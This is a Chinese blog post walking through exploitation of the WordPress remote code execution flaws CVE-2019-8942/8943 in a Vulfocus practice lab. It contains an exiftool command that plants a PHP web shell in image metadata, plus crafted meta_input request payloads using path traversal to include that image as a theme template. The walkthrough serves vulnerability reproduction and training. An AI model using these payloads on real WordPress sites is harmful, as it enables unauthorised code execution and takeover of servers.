<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="墨竹星海"><meta name="copyright" content="墨竹星海"><meta name="generator" content="Hexo 4.2.1"><meta name="theme" content="hexo-theme-yun"><title>Vulfocus靶场WordPress远程代码执行CVE-2019-8942/8943环境writeup | 墨竹星海’s Bolg</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;family=Source+Code+Pro&amp;display=swap" media="none" onload="this.media='all'"><script src="//at.alicdn.com/t/font_1140697_pem9yni52s.js" async></script><script src="/js/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link rel="shortcut icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"root":"/","title":"墨竹星海的小站","version":"0.9.0","anonymous_image":"/imgs/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><meta name="description" content="2019 年 2 月 19 日，RIPS 科技公司的 Simon Scannell 发表了他关于 WordPress 中可能导致远程代码执行 ( RCE ) 的核心漏洞的发现，这些漏洞被指定为 CVE-2019-8942 和 CVE-2019-8943。简单来说，如果能成功利用这些安全缺陷，且攻击者的身份权限至少在作者权限之上，那么攻击者就可以执行超文本预处理器 ( PHP ) 代码并获得完全的系">
<meta property="og:type" content="article">
<meta property="og:title" content="Vulfocus靶场WordPress远程代码执行CVE-2019-8942&#x2F;8943环境writeup">
<meta property="og:url" content="https://www.mzxh.xyz/2020/05/17/20200517/index.html">
<meta property="og:site_name" content="墨竹星海’s Bolg">
<meta property="og:description" content="2019 年 2 月 19 日，RIPS 科技公司的 Simon Scannell 发表了他关于 WordPress 中可能导致远程代码执行 ( RCE ) 的核心漏洞的发现，这些漏洞被指定为 CVE-2019-8942 和 CVE-2019-8943。简单来说，如果能成功利用这些安全缺陷，且攻击者的身份权限至少在作者权限之上，那么攻击者就可以执行超文本预处理器 ( PHP ) 代码并获得完全的系">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516215851.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516215701.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516220123.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516220352.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516220436.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516220647.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516220729.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516220801.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516220946.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516221052.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516221307.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516221645.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516221954.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516221941.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516222627.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516222033.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516222057.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516222139.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516222427.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516222754.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516223406.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516223341.png">
<meta property="og:image" content="https://www.mzxh.xyz/picture/20200516223629.png">
<meta property="article:published_time" content="2020-05-16T16:00:00.000Z">
<meta property="article:modified_time" content="2020-06-18T07:22:05.321Z">
<meta property="article:author" content="墨竹星海">
<meta property="article:tag" content="漏洞复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.mzxh.xyz/picture/20200516215851.png"></head><body><script defer src="/js/anime.min.js"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle sidebar-toggle-fixed hty-icon-button"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><aside class="sidebar"><script defer src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/" title="墨竹星海"><img width="96" loading="lazy" src="/Yun.png" alt="墨竹星海"></a><div class="site-author-name"><a href="/">墨竹星海</a></div><a class="site-name" href="/">墨竹星海’s Bolg</a><sub class="site-subtitle">When you look long into an abyss,the abyss looks into you.</sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">61</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">13</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">21</span></a></div><a class="site-state-item hty-icon-button" href="https://wpa.qq.com/msgrd?v=3&amp;uin=371299225&amp;site=qq&amp;menu=yes" target="_blank" rel="noopener" title="腾讯QQ"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#writeup"><span class="toc-number">1.</span> <span class="toc-text">writeup</span></a></li></ol></div></div></div><div class="tag-cloud"><div class="tag-cloud-tags"><a href="/tags/CobaltStrike/" style="font-size: 25.5px; color: #2680d4">CobaltStrike</a> <a href="/tags/Docker/" style="font-size: 21px; color: #4d89c0">Docker</a> <a href="/tags/Hexo/" style="font-size: 25.5px; color: #2680d4">Hexo</a> <a href="/tags/IIS/" style="font-size: 12px; color: #999">IIS</a> <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" style="font-size: 21px; color: #4d89c0">SQL注入</a> <a href="/tags/apache/" style="font-size: 12px; color: #999">apache</a> <a href="/tags/kali/" style="font-size: 25.5px; color: #2680d4">kali</a> <a href="/tags/mysql/" style="font-size: 12px; color: #999">mysql</a> <a href="/tags/python/" style="font-size: 12px; color: #999">python</a> <a href="/tags/ssr/" style="font-size: 12px; color: #999">ssr</a> <a href="/tags/web/" style="font-size: 12px; color: #999">web</a> <a href="/tags/%E4%BB%A3%E7%90%86/" style="font-size: 12px; color: #999">代理</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" style="font-size: 16.5px; color: #7391ad">信息收集</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2/" style="font-size: 16.5px; color: #7391ad">信息泄露</a> <a href="/tags/%E5%86%85%E7%BD%91/" style="font-size: 12px; color: #999">内网</a> <a href="/tags/%E5%AE%89%E5%85%A8/" style="font-size: 21px; color: #4d89c0">安全</a> <a href="/tags/%E5%B7%A5%E4%BD%9C/" style="font-size: 12px; color: #999">工作</a> <a href="/tags/%E6%8F%90%E6%9D%83/" style="font-size: 12px; color: #999">提权</a> <a href="/tags/%E6%A0%91%E8%8E%93%E6%B4%BE/" style="font-size: 16.5px; color: #7391ad">树莓派</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" style="font-size: 30px; color: #0078e7">漏洞复现</a></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://www.mzxh.xyz/2020/05/17/20200517/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="墨竹星海"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="墨竹星海’s Bolg"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">Vulfocus靶场WordPress远程代码执行CVE-2019-8942/8943环境writeup</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2020-05-17 00:00:00" itemprop="dateCreated datePublished" datetime="2020-05-17T00:00:00+08:00">2020-05-17</time></div><div class="post-classify"><span class="post-category"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span> <span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category" href="/categories/vulfocus%E9%9D%B6%E5%9C%BA/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">vulfocus靶场</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">漏洞复现</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content post-markdown"><p>2019 年 2 月 19 日，RIPS 科技公司的 Simon Scannell 发表了他关于 WordPress 中可能导致远程代码执行 ( RCE ) 的核心漏洞的发现，这些漏洞被指定为 CVE-2019-8942 和 CVE-2019-8943。简单来说，如果能成功利用这些安全缺陷，且攻击者的身份权限至少在作者权限之上，那么攻击者就可以执行超文本预处理器 ( PHP ) 代码并获得完全的系统控制。受影响的 WordPress 版本包括版本 5 ( 5.0.1 之前 ) 和 4 ( 4.9.9 之前 ) 。这些漏洞也已披露给了 WordPress 的安全团队。<a id="more"></a></p>
<h3 id="writeup"><a href="#writeup" class="headerlink" title="writeup"></a>writeup</h3><p>生成一个恶意图片</p>
<pre><code>exiftool shell.jpg -documentname=&quot;&lt;?php echo exec(\$_POST[&#39;cmd&#39;]); ?&gt;&quot;</code></pre><p><img src="https://www.mzxh.xyz/picture/20200516215851.png" alt="markdown" loading="lazy"></p>
<p>启动靶场，使用author账号登入后台。默认账号密码为author/author4wp498</p>
<p>登入后在media-add new处上传生成的恶意图片</p>
<p><img src="https://www.mzxh.xyz/picture/20200516215701.png" alt="markdown" loading="lazy"></p>
<p>点击Select Files上传图片，然后点击Edit</p>
<p><img src="https://www.mzxh.xyz/picture/20200516220123.png" alt="markdown" loading="lazy"></p>
<p>点击update并抓包<br><img src="https://www.mzxh.xyz/picture/20200516220352.png" alt="markdown" loading="lazy"></p>
<p>把抓取到的这个包 发送到repeater模块</p>
<p><img src="https://www.mzxh.xyz/picture/20200516220436.png" alt="markdown" loading="lazy"></p>
<p>重新点击media，点击刚刚的图片</p>
<p><img src="https://www.mzxh.xyz/picture/20200516220647.png" alt="markdown" loading="lazy"></p>
<p>选择 Edit more details</p>
<p><img src="https://www.mzxh.xyz/picture/20200516220729.png" alt="markdown" loading="lazy"></p>
<p>点击Edit Image</p>
<p><img src="https://www.mzxh.xyz/picture/20200516220801.png" alt="markdown" loading="lazy"></p>
<p>对照片进行随意裁剪，然后点击save并抓包<br><img src="https://www.mzxh.xyz/picture/20200516220946.png" alt="markdown" loading="lazy"></p>
<p>把抓取到的这个包 发送到repeater模块<br><img src="https://www.mzxh.xyz/picture/20200516221052.png" alt="markdown" loading="lazy"></p>
<p>进行payload构造<br>在repeater模块中选择第一个抓取的数据包<br>在结尾处添加</p>
<pre><code>&amp;meta_input[_wp_attached_file]=year/month/file#/file</code></pre><p>year=年<br>month=月<br>file=上传的文件名<br><img src="https://www.mzxh.xyz/picture/20200516221307.png" alt="markdown" loading="lazy"><br>点击go发包</p>
<p>返回302不用管，去另一个数据包发包</p>
<p><img src="https://www.mzxh.xyz/picture/20200516221645.png" alt="markdown" loading="lazy"></p>
<p>然后返回第一个数据包<br>把payload进行修改</p>
<pre><code>&amp;meta_input[_wp_attached_file]=year/month/file#/../../../../themes/twentyseventeen/file</code></pre><p><img src="https://www.mzxh.xyz/picture/20200516221954.png" alt="markdown" loading="lazy"></p>
<p><img src="https://www.mzxh.xyz/picture/20200516221941.png" alt="markdown" loading="lazy"></p>
<p>记住返回包中twentyseventeen路径后的文件名，最后一个payload需要</p>
<p><img src="https://www.mzxh.xyz/picture/20200516222627.png" alt="markdown" loading="lazy"></p>
<p>然后点击Posts</p>
<p><img src="https://www.mzxh.xyz/picture/20200516222033.png" alt="markdown" loading="lazy"></p>
<p>点击addnew</p>
<p><img src="https://www.mzxh.xyz/picture/20200516222057.png" alt="markdown" loading="lazy"></p>
<p>随便输入一个标题，然后点击publish并抓包（此时抓到的包在proxy模块中一定不要放掉）</p>
<p><img src="https://www.mzxh.xyz/picture/20200516222139.png" alt="markdown" loading="lazy"></p>
<p><img src="https://www.mzxh.xyz/picture/20200516222427.png" alt="markdown" loading="lazy"></p>
<p>创建最后一个payload</p>
<pre><code>&amp;meta_input[_wp_page_template]=cropped image</code></pre><p>cropped image的值为上一次数据包中twentyseventeen路径后的文件名</p>
<p><img src="https://www.mzxh.xyz/picture/20200516222754.png" alt="markdown" loading="lazy"></p>
<p>访问post中的路径</p>
<p><img src="https://www.mzxh.xyz/picture/20200516223406.png" alt="markdown" loading="lazy"></p>
<p><img src="https://www.mzxh.xyz/picture/20200516223341.png" alt="markdown" loading="lazy"></p>
<p>执行命令成功</p>
<p><img src="https://www.mzxh.xyz/picture/20200516223629.png" alt="markdown" loading="lazy"></p>
<p>获取到flag文件</p>
<p>（首发至安恒内部文档）</p>
<p>文档过于复杂，可能存在描述不清的地方，可以搭配视频复现<br><a href="https://youtu.be/p7EwwPYzYcQ" target="_blank" rel="noopener">https://youtu.be/p7EwwPYzYcQ</a></p>
</div><ul class="post-copyright"><li class="post-copyright-author"><strong>转载请注明来自：</strong>墨竹星海</li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2020/05/17/20200517-7/" rel="prev" title="Vulfocus靶场Shiro反序列化CVE-2016-4437环境writeup"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">Vulfocus靶场Shiro反序列化CVE-2016-4437环境writeup</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2020/05/12/20200512/" rel="next" title="vulfocus0.2.1新版本本地化部署"><span class="post-nav-text">vulfocus0.2.1新版本本地化部署</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div></main><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="http://www.beian.miit.gov.cn" target="_blank">浙ICP备19034345号</a></div><div class="copyright"><span>&copy; 2018 – 2021 </span><span class="with-love" id="animate"></span><span class="author"> 墨竹星海</span></div><div class="powered"><span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_uv"></span>次</span><span class="footer-separator">| </span><span id="busuanzi_container_page_pv"> 本文总阅读量<span id="busuanzi_value_page_pv"></span>次</span></div><div class="live_time"><span>本博客已稳定运行</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  window.setTimeout(blog_live_time, 1000);
  const start = new Date('2018-09-01T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div></footer><a class="hty-icon-button" id="goUp" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a></div><script defer src="/js/utils.js"></script><script defer src="/js/hexo-theme-yun.js"></script></body></html>